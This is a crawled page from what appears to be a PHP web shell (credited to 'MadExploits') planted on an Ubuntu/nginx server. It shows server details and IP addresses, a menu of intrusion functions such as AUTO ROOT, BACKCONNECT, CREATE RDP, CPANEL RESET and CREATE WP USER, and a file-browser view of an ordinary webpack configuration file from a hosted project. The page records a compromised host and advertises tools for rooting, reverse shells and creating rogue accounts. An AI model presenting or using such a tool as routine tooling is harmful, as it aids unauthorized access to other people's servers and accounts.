Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core-ui-code /
internals /
webpack /
[ HOME SHELL ]
Name
Size
Permission
Action
webpack.base.babel.js
3.71
KB
-rwxrwxr-x
webpack.dev.babel.js
2.01
KB
-rwxrwxr-x
webpack.prod.babel.js
4.43
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : webpack.base.babel.js
/** * COMMON WEBPACK CONFIGURATION */ const path = require('path'); const webpack = require('webpack'); const Dotenv = require('dotenv-webpack'); const ForkTsCheckerWebpackPlugin = require('fork-ts-checker-webpack-plugin'); module.exports = options => ({ mode: options.mode, entry: options.entry, output: { // Compile into js/build.js path: path.resolve(process.cwd(), 'build'), publicPath: '/', // Merge with env dependent settings ...options.output, }, optimization: options.optimization, module: { rules: [ { test: /\.jsx?$/, // Transform all .js and .jsx files required somewhere with Babel exclude: /node_modules/, use: { loader: 'babel-loader', options: options.babelQuery, }, }, { test: /\.ts(x?)$/, // Transform typescript files with ts-loader exclude: /node_modules/, use: options.tsLoaders, }, { // Preprocess our own .css files // This is the place to add your own loaders (e.g. sass/less etc.) // for a list of loaders, see https://webpack.js.org/loaders/#styling test: /\.css$/, exclude: /node_modules/, use: ['style-loader', 'css-loader'], }, { // Preprocess 3rd party .css files located in node_modules test: /\.css$/, include: /node_modules/, use: ['style-loader', 'css-loader'], }, { test: /\.(eot|otf|ttf|woff|woff2)$/, use: 'file-loader', }, { test: /\.svg$/, use: [ { loader: 'svg-url-loader', options: { // Inline files smaller than 10 kB limit: 10 * 1024, noquotes: true, }, }, ], }, { test: /\.(jpg|png|gif)$/, use: [ { loader: 'url-loader', options: { // Inline files smaller than 10 kB limit: 10 * 1024, }, }, { loader: 'image-webpack-loader', options: { mozjpeg: { enabled: false, // NOTE: mozjpeg is disabled as it causes errors in some Linux environments // Try enabling it in your environment by switching the config to: // enabled: true, // progressive: true, }, gifsicle: { interlaced: false, }, optipng: { optimizationLevel: 7, }, pngquant: { quality: [0.65, 0.90], speed: 4, }, }, }, ], }, { test: /\.html$/, use: 'html-loader', }, { test: /\.(mp4|webm)$/, use: { loader: 'url-loader', options: { limit: 10000, }, }, }, ], }, plugins: options.plugins.concat([ // Always expose NODE_ENV to webpack, in order to use `process.env.NODE_ENV` // inside your code for any environment checks; Terser will automatically // drop any unreachable code. new webpack.EnvironmentPlugin({ NODE_ENV: 'development', }), // Run typescript checker new ForkTsCheckerWebpackPlugin({ checkSyntacticErrors: false }), new Dotenv(), ]), resolve: { modules: ['node_modules', 'app'], extensions: ['.js', '.jsx', '.react.js', '.ts', '.tsx'], alias: { 'react-dom': '@hot-loader/react-dom', }, }, node: { fs: 'empty', }, devtool: options.devtool, target: 'web', // Make web variables accessible to webpack, e.g. window performance: options.performance || {}, });
Close